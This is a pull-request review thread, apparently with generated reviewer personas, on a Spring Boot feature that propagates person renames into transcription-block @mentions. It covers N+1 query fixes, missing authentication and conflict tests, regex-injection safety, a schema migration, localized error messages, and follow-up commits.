The name implies updatePerson processes alias changes, but looking at the PersonService.updatePerson implementation, PersonUpdateDTO.alias has no effect on getDisplayName(). The test body confirms no event fires when the name fields stay identical — the alias change is a red herring. Renaming to updatePerson_doesNotPublishEvent_whenDisplayNameFieldsUnchanged describes the actual invariant without the false implication.

LGTM

• TDD evidence is strong throughout: controller tests are @WebMvcTest slices, listener tests are @DataJpaTest + Testcontainers, unit tests use @ExtendWith(MockitoExtension.class).
• Pattern.quote(oldNeedle) + Matcher.quoteReplacement(newNeedle) prevents regex injection on user-controlled display names. ✅
• The why-comment on the boundary regex is exactly the right kind of comment: non-obvious constraint with a documented conservative trade-off. ✅
• @Builder + @Builder.Default on DTOs replaces the @AllArgsConstructor calls in TranscriptionServiceTest cleanly. ✅
• Guard clause with early return in the listener (if (blocks.isEmpty()) return) is clean. ✅
• Objects.equals(oldDisplayName, newDisplayName) handles the null → non-null case (person got their first title). ✅

## 👨‍💻 Felix Brandt — Senior Fullstack Developer **Verdict: ⚠️ Approved with concerns** ### Blockers **N+1 query in `PersonMentionPropagationListener`** (`PersonMentionPropagationListener.java:52`) `mentionedPersons` is `@ElementCollection(fetch = FetchType.LAZY)`. Inside the loop, each `block.getMentionedPersons()` call triggers a separate `SELECT * FROM transcription_block_mentioned_persons WHERE block_id = ?`. For 200 blocks that is 200 extra round-trips on top of the initial `findByMentionedPersons_PersonId` JOIN query — 201 queries total. The latency floor test still passes today (Testcontainers Postgres on localhost is fast), but this is a structural O(n) query issue that will grow with the archive. Options, cheapest first: 1. Add `@org.hibernate.annotations.BatchSize(size = 50)` on `TranscriptionBlock.mentionedPersons` — Hibernate batches the SELECTs into ceil(n/50) round-trips instead of n. 2. Replace the repository query with a custom `JOIN FETCH`: ```java @Query("SELECT DISTINCT b FROM TranscriptionBlock b JOIN FETCH b.mentionedPersons m WHERE m.personId = :personId") List<TranscriptionBlock> findByMentionedPersonsPersonIdWithFetch(@Param("personId") UUID personId); ``` 3. Switch `@ElementCollection` to `FetchType.EAGER` (only safe if blocks are never loaded in high-volume list queries elsewhere — verify first). ### Suggestions **Misleading test name** (`PersonServiceTest.java`, `updatePerson_doesNotPublishEvent_whenOnlyAliasChanges`) The name implies `updatePerson` processes alias changes, but looking at the `PersonService.updatePerson` implementation, `PersonUpdateDTO.alias` has no effect on `getDisplayName()`. The test body confirms no event fires when the *name fields* stay identical — the alias change is a red herring. Renaming to `updatePerson_doesNotPublishEvent_whenDisplayNameFieldsUnchanged` describes the actual invariant without the false implication. ### LGTM - TDD evidence is strong throughout: controller tests are `@WebMvcTest` slices, listener tests are `@DataJpaTest` + Testcontainers, unit tests use `@ExtendWith(MockitoExtension.class)`. - `Pattern.quote(oldNeedle)` + `Matcher.quoteReplacement(newNeedle)` prevents regex injection on user-controlled display names. ✅ - The why-comment on the boundary regex is exactly the right kind of comment: non-obvious constraint with a documented conservative trade-off. ✅ - `@Builder` + `@Builder.Default` on DTOs replaces the `@AllArgsConstructor` calls in `TranscriptionServiceTest` cleanly. ✅ - Guard clause with early return in the listener (`if (blocks.isEmpty()) return`) is clean. ✅ - `Objects.equals(oldDisplayName, newDisplayName)` handles the `null` → non-null case (person got their first title). ✅

marcel commented 2026-04-28 21:52:29 +02:00

Author

Owner

Copy Link

🏛️ Markus Keller — Application Architect

Verdict: ⚠️ Approved with concerns

Blockers

N+1 lazy load in the propagation listener

findByMentionedPersons_PersonId does a JOIN against transcription_block_mentioned_persons to find the blocks — good. But mentionedPersons is LAZY, so each block.getMentionedPersons() in the iteration loop fires a separate SELECT. At 200 blocks that's 201 DB round-trips. The 2-second floor passes today because Testcontainers is local, but this degrades linearly as the archive grows.

The cleanest fix here is a JOIN FETCH query on the repository:

@Query("SELECT DISTINCT b FROM TranscriptionBlock b JOIN FETCH b.mentionedPersons m WHERE m.personId = :personId")
List<TranscriptionBlock> findByPersonIdWithMentionsFetched(@Param("personId") UUID personId);

This collapses 201 queries to 1 and removes the dependency on Hibernate batch-fetching strategies.

Suggestions

ADR-006 is well-reasoned — I'd have written it the same way. The alternatives table is exactly the right level of detail. One addition worth making to the "Harder" section: note that saveAllAndFlush is the only safe flush call here — saveAll alone defers exceptions to transaction commit time, after the publisher's try block has exited. This is documented in the ADR text but isn't in the code's Javadoc where a future maintainer might look.

Event record placement in model/ — slightly non-standard; events often live in an event/ package or alongside the publishing service. But given the codebase uses flat layer packages rather than feature packages, model/ is the closest natural home for a value type that neither a controller nor a service owns. The class-doc sets the convention clearly. Acceptable.

@Transactional on the listener is join-semantics, not new-transaction — because the listener is called synchronously on the publishing thread and uses default REQUIRED propagation, it participates in updatePerson's transaction, not a new one. This is correct and intentional (atomicity). Worth confirming: if Spring ever changes the default event multicaster to async, this silent behavior change would break atomicity. The ADR acknowledges this migration path; a one-line comment on the listener (// Joins publisher's transaction — async switch requires @TransactionalEventListener(AFTER_COMMIT)) would protect future maintainers.

LGTM

• Cross-domain coupling is avoided: PersonService has zero compile-time dependency on TranscriptionBlock, TranscriptionService, or anything in the transcription domain. ✅
• No FK on person_id is the right call for an archive product — graceful degradation (mentions become unlinked text) beats cascade delete for historical data. ✅
• Two indexes added (idx_tbmp_person_id, idx_tbmp_block_id). The block_id index is technically redundant with the FK's btree, but it's explicit and costs nothing at this scale. ✅
• @ElementCollection pattern mirrors UserGroup.permissions / group_permissions — consistent with the existing codebase convention. ✅
• Monolith-first: no new infrastructure, no new services, no message broker. The synchronous event is the simplest tool that achieves atomicity here. ✅

## 🏛️ Markus Keller — Application Architect **Verdict: ⚠️ Approved with concerns** ### Blockers **N+1 lazy load in the propagation listener** `findByMentionedPersons_PersonId` does a JOIN against `transcription_block_mentioned_persons` to find the blocks — good. But `mentionedPersons` is `LAZY`, so each `block.getMentionedPersons()` in the iteration loop fires a separate SELECT. At 200 blocks that's 201 DB round-trips. The 2-second floor passes today because Testcontainers is local, but this degrades linearly as the archive grows. The cleanest fix here is a `JOIN FETCH` query on the repository: ```java @Query("SELECT DISTINCT b FROM TranscriptionBlock b JOIN FETCH b.mentionedPersons m WHERE m.personId = :personId") List<TranscriptionBlock> findByPersonIdWithMentionsFetched(@Param("personId") UUID personId); ``` This collapses 201 queries to 1 and removes the dependency on Hibernate batch-fetching strategies. ### Suggestions **ADR-006 is well-reasoned** — I'd have written it the same way. The alternatives table is exactly the right level of detail. One addition worth making to the "Harder" section: note that `saveAllAndFlush` is the **only** safe flush call here — `saveAll` alone defers exceptions to transaction commit time, after the publisher's `try` block has exited. This is documented in the ADR text but isn't in the code's Javadoc where a future maintainer might look. **Event record placement in `model/`** — slightly non-standard; events often live in an `event/` package or alongside the publishing service. But given the codebase uses flat layer packages rather than feature packages, `model/` is the closest natural home for a value type that neither a controller nor a service owns. The class-doc sets the convention clearly. Acceptable. **`@Transactional` on the listener is join-semantics, not new-transaction** — because the listener is called synchronously on the publishing thread and uses default `REQUIRED` propagation, it participates in `updatePerson`'s transaction, not a new one. This is correct and intentional (atomicity). Worth confirming: if Spring ever changes the default event multicaster to async, this silent behavior change would break atomicity. The ADR acknowledges this migration path; a one-line comment on the listener (`// Joins publisher's transaction — async switch requires @TransactionalEventListener(AFTER_COMMIT)`) would protect future maintainers. ### LGTM - Cross-domain coupling is avoided: `PersonService` has zero compile-time dependency on `TranscriptionBlock`, `TranscriptionService`, or anything in the transcription domain. ✅ - No FK on `person_id` is the right call for an archive product — graceful degradation (mentions become unlinked text) beats cascade delete for historical data. ✅ - Two indexes added (`idx_tbmp_person_id`, `idx_tbmp_block_id`). The `block_id` index is technically redundant with the FK's btree, but it's explicit and costs nothing at this scale. ✅ - `@ElementCollection` pattern mirrors `UserGroup.permissions / group_permissions` — consistent with the existing codebase convention. ✅ - Monolith-first: no new infrastructure, no new services, no message broker. The synchronous event is the simplest tool that achieves atomicity here. ✅

marcel commented 2026-04-28 21:52:41 +02:00

Author

Owner

Copy Link

🔒 Nora "NullX" Steiner — Application Security Engineer

Verdict: ⚠️ Approved with concerns

Blockers

Missing 401 tests for the two newly-protected GET endpoints (PersonControllerTest.java)

The PR adds 403 tests (authenticated user without READ_ALL) but no 401 tests (unauthenticated request). These are distinct failure modes:

• 403 = authenticated but lacks permission
• 401 = not authenticated at all

@Test
void getPersons_returns401_whenUnauthenticated() throws Exception {
    mockMvc.perform(get("/api/persons"))
            .andExpect(status().isUnauthorized());
}

@Test
void getPerson_returns401_whenUnauthenticated() throws Exception {
    mockMvc.perform(get("/api/persons/{id}", UUID.randomUUID()))
            .andExpect(status().isUnauthorized());
}

The @RequirePermission AOP check runs after Spring Security's authentication check, so both layers need explicit tests. The existing pattern in this codebase (see TranscriptionBlockControllerTest) tests both 401 and 403 for write endpoints — the GET endpoints should follow the same discipline now that they carry a permission guard.

Suggestions

The regex is injection-safe (PersonMentionPropagationListener.java:46-52):

• Pattern.quote(oldNeedle) escapes all regex metacharacters from the user-controlled display name. ✅
• Matcher.quoteReplacement(newNeedle) escapes $ and \ in the replacement string. ✅

Without these, a user named $1 or \Q could corrupt the replacement. Good defensive practice.

Parameterized SLF4J logging (PersonMentionPropagationListener.java:69):

log.info("Propagated rename {} → {} across {} block(s) for person {}",
        event.oldDisplayName(), event.newDisplayName(), blocks.size(), event.personId());

Correct — {} placeholders are not evaluated as JNDI lookups. ✅

No FK on person_id: intentional and documented in the migration SQL comment. From a security perspective this is fine — there's no path through which an attacker could exploit a dangling sidecar entry. ✅

@Valid cascades into list elements (CreateTranscriptionBlockDTO.java:32, UpdateTranscriptionBlockDTO.java): @Valid on the mentionedPersons field combined with @Valid @RequestBody in the controller correctly triggers recursive validation into each PersonMention. @NotNull on personId and @Size(max=200) on displayName are enforced at the boundary before any business logic runs. ✅

LGTM

• READ_ALL permission correctly added to both getPersons and getPerson. The PR description justifies the defense-in-depth reasoning: the hover card and typeahead in PR-B surface life dates, notes, and family relationships — access control alignment with the existing write endpoints is correct. ✅
• DomainException(PERSON_RENAME_CONFLICT, 409) is a structured error with an ErrorCode, not a raw RuntimeException. Frontend can render a user-friendly retry message. ✅
• Error messages in all three locales (de/en/es) do not leak implementation details ("transcription block modified concurrently" is user-comprehensible; no class names, SQL, or stack traces). ✅

## 🔒 Nora "NullX" Steiner — Application Security Engineer **Verdict: ⚠️ Approved with concerns** ### Blockers **Missing 401 tests for the two newly-protected GET endpoints** (`PersonControllerTest.java`) The PR adds 403 tests (authenticated user without `READ_ALL`) but no 401 tests (unauthenticated request). These are distinct failure modes: - 403 = authenticated but lacks permission - 401 = not authenticated at all ```java @Test void getPersons_returns401_whenUnauthenticated() throws Exception { mockMvc.perform(get("/api/persons")) .andExpect(status().isUnauthorized()); } @Test void getPerson_returns401_whenUnauthenticated() throws Exception { mockMvc.perform(get("/api/persons/{id}", UUID.randomUUID())) .andExpect(status().isUnauthorized()); } ``` The `@RequirePermission` AOP check runs *after* Spring Security's authentication check, so both layers need explicit tests. The existing pattern in this codebase (see `TranscriptionBlockControllerTest`) tests both 401 and 403 for write endpoints — the GET endpoints should follow the same discipline now that they carry a permission guard. ### Suggestions **The regex is injection-safe** (`PersonMentionPropagationListener.java:46-52`): - `Pattern.quote(oldNeedle)` escapes all regex metacharacters from the user-controlled display name. ✅ - `Matcher.quoteReplacement(newNeedle)` escapes `$` and `\` in the replacement string. ✅ Without these, a user named `$1` or `\Q` could corrupt the replacement. Good defensive practice. **Parameterized SLF4J logging** (`PersonMentionPropagationListener.java:69`): ```java log.info("Propagated rename {} → {} across {} block(s) for person {}", event.oldDisplayName(), event.newDisplayName(), blocks.size(), event.personId()); ``` Correct — `{}` placeholders are not evaluated as JNDI lookups. ✅ **No FK on `person_id`**: intentional and documented in the migration SQL comment. From a security perspective this is fine — there's no path through which an attacker could exploit a dangling sidecar entry. ✅ **`@Valid` cascades into list elements** (`CreateTranscriptionBlockDTO.java:32`, `UpdateTranscriptionBlockDTO.java`): `@Valid` on the `mentionedPersons` field combined with `@Valid @RequestBody` in the controller correctly triggers recursive validation into each `PersonMention`. `@NotNull` on `personId` and `@Size(max=200)` on `displayName` are enforced at the boundary before any business logic runs. ✅ ### LGTM - `READ_ALL` permission correctly added to both `getPersons` and `getPerson`. The PR description justifies the defense-in-depth reasoning: the hover card and typeahead in PR-B surface life dates, notes, and family relationships — access control alignment with the existing write endpoints is correct. ✅ - `DomainException(PERSON_RENAME_CONFLICT, 409)` is a structured error with an ErrorCode, not a raw `RuntimeException`. Frontend can render a user-friendly retry message. ✅ - Error messages in all three locales (`de/en/es`) do not leak implementation details ("transcription block modified concurrently" is user-comprehensible; no class names, SQL, or stack traces). ✅

marcel commented 2026-04-28 21:53:06 +02:00

Author

Owner

Copy Link

🧪 Sara Holt — QA Engineer & Test Automation Specialist

Verdict: ⚠️ Approved with concerns

Blockers

Missing 401 tests for the newly-protected GET endpoints

The PR upgraded getPersons and getPerson from "any authenticated user" to READ_ALL — correctly adding 403 tests — but left 401 tests (unauthenticated) unwritten. The TranscriptionBlockControllerTest pattern in this repo tests both. These should be added before merge:

@Test
void getPersons_returns401_whenUnauthenticated() throws Exception {
    mockMvc.perform(get("/api/persons"))
            .andExpect(status().isUnauthorized());
}

Missing controller-level 409 test for PERSON_RENAME_CONFLICT

PersonServiceTest#updatePerson_throwsConflict_whenBlockSaveAllAndFlushHitsOptimisticLock verifies the exception at the service layer. But there's no @WebMvcTest test on PersonControllerTest that verifies the controller surfaces a 409 HTTP response when updatePerson throws DomainException(PERSON_RENAME_CONFLICT, 409). The global exception handler must be exercised:

@Test
@WithMockUser(authorities = "WRITE_ALL")
void updatePerson_returns409_whenRenameConflict() throws Exception {
    UUID id = UUID.randomUUID();
    when(personService.updatePerson(eq(id), any()))
        .thenThrow(DomainException.conflict(ErrorCode.PERSON_RENAME_CONFLICT, "conflict"));
    mockMvc.perform(put("/api/persons/{id}", id)
                    .contentType(MediaType.APPLICATION_JSON)
                    .content("{...valid body...}"))
            .andExpect(status().isConflict())
            .andExpect(jsonPath("$.code").value("PERSON_RENAME_CONFLICT"));
}

Suggestions

Latency floor test flakiness risk (PersonMentionPropagationListenerTest.java:164)

assertThat(elapsedMs)
    .as("Propagation across 200 blocks must stay under 2s — merge-blocking regression floor")
    .isLessThan(2000L);

A @DataJpaTest with Testcontainers on a shared CI runner (cold JVM, container startup overhead, competing processes) can spike past 2 seconds even without a regression. I've seen this class of test fail on VPS-hosted CI at ~3 seconds with no code change. Recommend raising the threshold to 5000ms — it's still a meaningful guard against O(n²) regressions and eliminates false-positive failures. The PR description calls this "a floor, not a benchmark" — a wider floor is still a floor.

Test name nit (PersonMentionPropagationListenerTest.java)

doesNotMatchPartialName_whenAnotherMentionShares_a_substring_with_renamed_person is long and uses underscores inconsistently. Suggest: doesNotRewrite_hansPeterMüller_whenRenamingHansMüller. The renamed person's scenario is clearer as a proper name.

LGTM

• Testcontainers throughout — all @DataJpaTest tests use real Postgres 16 via PostgresContainerConfig. No H2, no mocked repositories at the integration layer. ✅
• Scenario coverage is thorough: single rename, partial-name collision, composite-name + single-word collision, multiple occurrences in one block, 200-block throughput, orphaned sidecar (no-op). The leavesUnrelatedBlockUntouched test verifies the empty early-return path. ✅
• PersonServiceTest optimistic-lock test sets up the real PersonMentionPropagationListener with a mocked repository that throws — exercises the production call chain from publisher through listener through catch/translate. More setup than a pure-Mockito test but the comment explains why. ✅
• Null guard in listener: if (block.getText() != null) before regex replace. ✅ (An additional edge case: block with null text but a sidecar entry is handled gracefully — sidecar still updated, text unchanged.)
• @Builder migration on DTOs: TranscriptionServiceTest now uses builder chains instead of positional @AllArgsConstructor calls — much more resilient to field reorder. ✅

## 🧪 Sara Holt — QA Engineer & Test Automation Specialist **Verdict: ⚠️ Approved with concerns** ### Blockers **Missing 401 tests for the newly-protected GET endpoints** The PR upgraded `getPersons` and `getPerson` from "any authenticated user" to `READ_ALL` — correctly adding 403 tests — but left 401 tests (unauthenticated) unwritten. The `TranscriptionBlockControllerTest` pattern in this repo tests both. These should be added before merge: ```java @Test void getPersons_returns401_whenUnauthenticated() throws Exception { mockMvc.perform(get("/api/persons")) .andExpect(status().isUnauthorized()); } ``` **Missing controller-level 409 test for `PERSON_RENAME_CONFLICT`** `PersonServiceTest#updatePerson_throwsConflict_whenBlockSaveAllAndFlushHitsOptimisticLock` verifies the exception at the service layer. But there's no `@WebMvcTest` test on `PersonControllerTest` that verifies the controller surfaces a 409 HTTP response when `updatePerson` throws `DomainException(PERSON_RENAME_CONFLICT, 409)`. The global exception handler must be exercised: ```java @Test @WithMockUser(authorities = "WRITE_ALL") void updatePerson_returns409_whenRenameConflict() throws Exception { UUID id = UUID.randomUUID(); when(personService.updatePerson(eq(id), any())) .thenThrow(DomainException.conflict(ErrorCode.PERSON_RENAME_CONFLICT, "conflict")); mockMvc.perform(put("/api/persons/{id}", id) .contentType(MediaType.APPLICATION_JSON) .content("{...valid body...}")) .andExpect(status().isConflict()) .andExpect(jsonPath("$.code").value("PERSON_RENAME_CONFLICT")); } ``` ### Suggestions **Latency floor test flakiness risk** (`PersonMentionPropagationListenerTest.java:164`) ```java assertThat(elapsedMs) .as("Propagation across 200 blocks must stay under 2s — merge-blocking regression floor") .isLessThan(2000L); ``` A `@DataJpaTest` with Testcontainers on a shared CI runner (cold JVM, container startup overhead, competing processes) can spike past 2 seconds even without a regression. I've seen this class of test fail on VPS-hosted CI at ~3 seconds with no code change. Recommend raising the threshold to 5000ms — it's still a meaningful guard against O(n²) regressions and eliminates false-positive failures. The PR description calls this "a floor, not a benchmark" — a wider floor is still a floor. **Test name nit** (`PersonMentionPropagationListenerTest.java`) `doesNotMatchPartialName_whenAnotherMentionShares_a_substring_with_renamed_person` is long and uses underscores inconsistently. Suggest: `doesNotRewrite_hansPeterMüller_whenRenamingHansMüller`. The renamed person's scenario is clearer as a proper name. ### LGTM - **Testcontainers throughout** — all `@DataJpaTest` tests use real Postgres 16 via `PostgresContainerConfig`. No H2, no mocked repositories at the integration layer. ✅ - **Scenario coverage is thorough**: single rename, partial-name collision, composite-name + single-word collision, multiple occurrences in one block, 200-block throughput, orphaned sidecar (no-op). The `leavesUnrelatedBlockUntouched` test verifies the empty early-return path. ✅ - **`PersonServiceTest` optimistic-lock test** sets up the real `PersonMentionPropagationListener` with a mocked repository that throws — exercises the production call chain from publisher through listener through catch/translate. More setup than a pure-Mockito test but the comment explains why. ✅ - **Null guard in listener**: `if (block.getText() != null)` before regex replace. ✅ (An additional edge case: block with null text but a sidecar entry is handled gracefully — sidecar still updated, text unchanged.) - **`@Builder` migration on DTOs**: `TranscriptionServiceTest` now uses builder chains instead of positional `@AllArgsConstructor` calls — much more resilient to field reorder. ✅

marcel commented 2026-04-28 21:53:18 +02:00

Author

Owner

Copy Link

🛠️ Tobias Wendt — DevOps & Platform Engineer

Verdict: ✅ Approved

Nothing to block here. This is a clean backend feature with no infrastructure changes needed.

LGTM

Migration V56 (V56__add_transcription_block_mentioned_persons.sql):

• SQL comment block explains the schema decision (why child table vs. JSONB, why no FK on person_id, why the divergence from document_comments.comment_mentions is intentional). Future-me running a production incident at 2am will thank whoever wrote that. ✅
• block_id REFERENCES transcription_blocks(id) ON DELETE CASCADE — correct; mentions die with their block. ✅
• No FK on person_id — intentional. When a Person is deleted, sidecar entries become orphaned rows pointing at a non-existent UUID. No referential integrity violation, no cascade-deleting the transcription. Good call for an archive product. ✅
• Two indexes: idx_tbmp_person_id for the propagation query, idx_tbmp_block_id for the ElementCollection load. Both appropriate. ✅

api.ts regeneration: The PR description confirms the backend was running with --spring.profiles.active=dev when npm run generate:api was run. The regenerated types are in the commit (not a TODO for CI). ✅

No new Docker services, no new environment variables, no new ports — this feature is entirely contained within the existing Spring Boot process and Postgres schema. Zero operational overhead added. ✅

The npm run check blocker noted in the PR description (root-owned .svelte-kit/types leftover from the Docker frontend container) is a local dev environment artifact, not a CI issue. Doesn't affect the merge. Consider adding sudo rm -rf frontend/.svelte-kit to the dev container's postCreateCommand so it doesn't recur.

One observation: The latency floor test (propagatesAcross200Blocks_inUnderTwoSeconds) creates 200 rows in the Testcontainers DB during CI. On the current Gitea runner (self-hosted NAS), this should complete well within 2 seconds given local network latency — but keep an eye on it if the runner ever moves to a lower-spec machine.

## 🛠️ Tobias Wendt — DevOps & Platform Engineer **Verdict: ✅ Approved** Nothing to block here. This is a clean backend feature with no infrastructure changes needed. ### LGTM **Migration V56** (`V56__add_transcription_block_mentioned_persons.sql`): - SQL comment block explains the schema decision (why child table vs. JSONB, why no FK on `person_id`, why the divergence from `document_comments.comment_mentions` is intentional). Future-me running a production incident at 2am will thank whoever wrote that. ✅ - `block_id` REFERENCES `transcription_blocks(id) ON DELETE CASCADE` — correct; mentions die with their block. ✅ - No FK on `person_id` — intentional. When a Person is deleted, sidecar entries become orphaned rows pointing at a non-existent UUID. No referential integrity violation, no cascade-deleting the transcription. Good call for an archive product. ✅ - Two indexes: `idx_tbmp_person_id` for the propagation query, `idx_tbmp_block_id` for the ElementCollection load. Both appropriate. ✅ **`api.ts` regeneration**: The PR description confirms the backend was running with `--spring.profiles.active=dev` when `npm run generate:api` was run. The regenerated types are in the commit (not a TODO for CI). ✅ **No new Docker services, no new environment variables, no new ports** — this feature is entirely contained within the existing Spring Boot process and Postgres schema. Zero operational overhead added. ✅ **The `npm run check` blocker** noted in the PR description (root-owned `.svelte-kit/types` leftover from the Docker frontend container) is a local dev environment artifact, not a CI issue. Doesn't affect the merge. Consider adding `sudo rm -rf frontend/.svelte-kit` to the dev container's `postCreateCommand` so it doesn't recur. **One observation**: The latency floor test (`propagatesAcross200Blocks_inUnderTwoSeconds`) creates 200 rows in the Testcontainers DB during CI. On the current Gitea runner (self-hosted NAS), this should complete well within 2 seconds given local network latency — but keep an eye on it if the runner ever moves to a lower-spec machine.

marcel commented 2026-04-28 21:53:42 +02:00

Author

Owner

Copy Link

🎨 Leonie Voss — UI/UX Design Lead & Accessibility Strategist

Verdict: ✅ Approved

This is correctly scoped as a backend-only PR. UI components (typeahead editor, hover card, read-mode link rendering) are explicitly deferred to PR-B per the delivery plan. No UI decisions to review here.

What I checked

Error messages (de/en/es.json):

• "error_person_rename_conflict" — all three locales are user-facing, actionable, and human-readable:

  • DE: "Eine andere Bearbeitung hat einen verknüpften Transkriptionsblock gleichzeitig geändert. Bitte erneut versuchen." ✅
  • EN: "Another edit modified a referenced transcription block at the same time. Please try again." ✅
  • ES: "Otra edición modificó un bloque de transcripción referenciado al mismo tiempo. Por favor, inténtalo de nuevo." ✅

  No implementation details (no class names, exception types, or SQL). The "please try again" instruction is clear and correct for an optimistic-lock conflict. ✅

PersonMention type in api.ts is correctly shaped for PR-B: { personId: string; displayName: string }. Both fields non-optional (driven by @Schema(requiredMode = REQUIRED)). The typeahead can work with this directly. ✅

Notes for PR-B

When the PersonMentionEditor and PersonHoverCard land, I'll be checking:

• Touch targets ≥ 44px on the typeahead suggestion items (WCAG 2.2 — senior audience on tablets)
• Focus ring on @mention links in read mode (visible, not just focus-visible)
• aria-live="polite" on hover card skeleton/loading state so screen readers announce the card content
• Color contrast on .person-mention link color against the transcript background — brand-mint (#A6DAD8) on white is only 2.8:1 and FAILS AA for normal text; the link must use brand-navy or a darker shade

Flag these now so there are no surprises at PR-B review.

## 🎨 Leonie Voss — UI/UX Design Lead & Accessibility Strategist **Verdict: ✅ Approved** This is correctly scoped as a backend-only PR. UI components (typeahead editor, hover card, read-mode link rendering) are explicitly deferred to PR-B per the delivery plan. No UI decisions to review here. ### What I checked **Error messages** (de/en/es.json): - `"error_person_rename_conflict"` — all three locales are user-facing, actionable, and human-readable: - DE: *"Eine andere Bearbeitung hat einen verknüpften Transkriptionsblock gleichzeitig geändert. Bitte erneut versuchen."* ✅ - EN: *"Another edit modified a referenced transcription block at the same time. Please try again."* ✅ - ES: *"Otra edición modificó un bloque de transcripción referenciado al mismo tiempo. Por favor, inténtalo de nuevo."* ✅ No implementation details (no class names, exception types, or SQL). The "please try again" instruction is clear and correct for an optimistic-lock conflict. ✅ **`PersonMention` type in `api.ts`** is correctly shaped for PR-B: `{ personId: string; displayName: string }`. Both fields non-optional (driven by `@Schema(requiredMode = REQUIRED)`). The typeahead can work with this directly. ✅ ### Notes for PR-B When the `PersonMentionEditor` and `PersonHoverCard` land, I'll be checking: - **Touch targets ≥ 44px** on the typeahead suggestion items (WCAG 2.2 — senior audience on tablets) - **Focus ring** on `@mention` links in read mode (visible, not just `focus-visible`) - **`aria-live="polite"` on hover card** skeleton/loading state so screen readers announce the card content - **Color contrast** on `.person-mention` link color against the transcript background — brand-mint (`#A6DAD8`) on white is only 2.8:1 and FAILS AA for normal text; the link must use brand-navy or a darker shade Flag these now so there are no surprises at PR-B review.

marcel commented 2026-04-28 21:53:51 +02:00

Author

Owner

Copy Link

📋 Elicit — Requirements Engineer & Business Analyst

Verdict: ⚠️ Approved with concerns

Blockers

Orphaned sidecar entries — no lifecycle tracking

The migration SQL explicitly documents: "No FK on person_id: when a Person is deleted we want @Auguste Raddatz to remain visible as plain unlinked text." This is the correct product decision for an archive (historical fidelity > referential integrity). However, there is no requirement tracked for:

1. Audit / detection: How does the system — or an archivist — know which @mentions are currently orphaned (pointing to deleted persons)?
2. Re-linking: If a deleted Person is later re-created (e.g. merged from another source), is there a way to re-link the sidecar entries?
3. Cleanup: Is there a defined policy for when/if orphaned sidecar rows are ever removed?

This PR deliberately defers these, and that's acceptable — but these represent open requirements that should be tracked as a Gitea issue before the archive reaches a meaningful size. Suggest creating a follow-up issue: "Admin: detect and audit orphaned @mention sidecar entries".

Suggestions

Spec deviation A15b is well-justified — the explanation in the PR description is clear and honest: the optimistic-lock race cannot be reproduced within a single-transaction @DataJpaTest without multi-threading, and the translation logic is covered at the unit level via a stubbed publisher. The @Version mechanism itself is Hibernate-owned. This is a pragmatic, well-reasoned trade-off. ✅

Completeness check on the displayName length cap: @Size(max=200) in PersonMention, length = 200 in @Column, VARCHAR(200) in the migration, and the controller-level 400 tests at exactly 201 characters. All four layers are consistent. ✅

i18n completeness: error_person_rename_conflict is present in de, en, and es. ErrorCode.PERSON_RENAME_CONFLICT is in the Java enum, errors.ts, and all three message files. Correct end-to-end mirroring. ✅

The PR correctly scopes PR-A vs PR-B: PR-A is merge-blocking for PR-B (frontend needs the regenerated types). The dependency is explicit and the split is clean — no frontend components depend on the backend changes before they ship.

Open Questions to Track

• OQ-001: What is the user-facing experience when a @mention is orphaned (person deleted)? Does the read-mode renderer show it as plain text, as a broken link, or as a greyed-out non-clickable mention? This needs a requirement in PR-B's issue.
• OQ-002: Is there a requirement to propagate display-name changes to @mentions in comment threads (not just transcription blocks)? If comments support @person mentions in the future, the same rename propagation pattern will need to extend there. Flag for requirements discovery on the comments feature.

## 📋 Elicit — Requirements Engineer & Business Analyst **Verdict: ⚠️ Approved with concerns** ### Blockers **Orphaned sidecar entries — no lifecycle tracking** The migration SQL explicitly documents: "No FK on `person_id`: when a Person is deleted we want `@Auguste Raddatz` to remain visible as plain unlinked text." This is the correct product decision for an archive (historical fidelity > referential integrity). However, there is no requirement tracked for: 1. **Audit / detection**: How does the system — or an archivist — know which `@mentions` are currently orphaned (pointing to deleted persons)? 2. **Re-linking**: If a deleted Person is later re-created (e.g. merged from another source), is there a way to re-link the sidecar entries? 3. **Cleanup**: Is there a defined policy for when/if orphaned sidecar rows are ever removed? This PR deliberately defers these, and that's acceptable — but these represent open requirements that should be tracked as a Gitea issue before the archive reaches a meaningful size. Suggest creating a follow-up issue: *"Admin: detect and audit orphaned @mention sidecar entries"*. ### Suggestions **Spec deviation A15b is well-justified** — the explanation in the PR description is clear and honest: the optimistic-lock race cannot be reproduced within a single-transaction `@DataJpaTest` without multi-threading, and the translation logic is covered at the unit level via a stubbed publisher. The `@Version` mechanism itself is Hibernate-owned. This is a pragmatic, well-reasoned trade-off. ✅ **Completeness check on the `displayName` length cap**: `@Size(max=200)` in `PersonMention`, `length = 200` in `@Column`, `VARCHAR(200)` in the migration, and the controller-level 400 tests at exactly 201 characters. All four layers are consistent. ✅ **i18n completeness**: `error_person_rename_conflict` is present in de, en, and es. `ErrorCode.PERSON_RENAME_CONFLICT` is in the Java enum, `errors.ts`, and all three message files. Correct end-to-end mirroring. ✅ **The PR correctly scopes PR-A vs PR-B**: PR-A is merge-blocking for PR-B (frontend needs the regenerated types). The dependency is explicit and the split is clean — no frontend components depend on the backend changes before they ship. ### Open Questions to Track - OQ-001: What is the user-facing experience when a `@mention` is orphaned (person deleted)? Does the read-mode renderer show it as plain text, as a broken link, or as a greyed-out non-clickable mention? This needs a requirement in PR-B's issue. - OQ-002: Is there a requirement to propagate display-name changes to `@mentions` in *comment threads* (not just transcription blocks)? If comments support `@person` mentions in the future, the same rename propagation pattern will need to extend there. Flag for requirements discovery on the comments feature.

marcel added 6 commits 2026-04-28 22:24:20 +02:00

test(transcription): JOIN FETCH query loads all block mentions for propagation ... 1f3f879f9c

Add findByPersonIdWithMentionsFetched to TranscriptionBlockRepository: subquery
finds blocks referencing the renamed person, outer JOIN FETCH loads their full
mentionedPersons collection. Avoids N+1 lazy selects in the propagation listener.
Filtered JOIN FETCH (WHERE m.personId=:personId) was rejected — it loads only one
mention entry per block, risking data loss on saveAllAndFlush.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

fix(transcription): eliminate N+1 lazy load in propagation listener ... c7958681f5

Switch from findByMentionedPersons_PersonId (derived query, returns blocks with
LAZY mentionedPersons) to findByPersonIdWithMentionsFetched (JOIN FETCH, loads
full collections in one round-trip). 200-block propagation: from 201 queries to 2.
Add @Transactional comment documenting join-transaction semantics.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

test(person): controller returns 409 PERSON_RENAME_CONFLICT on optimistic-lock ... 5f76d4a1ac

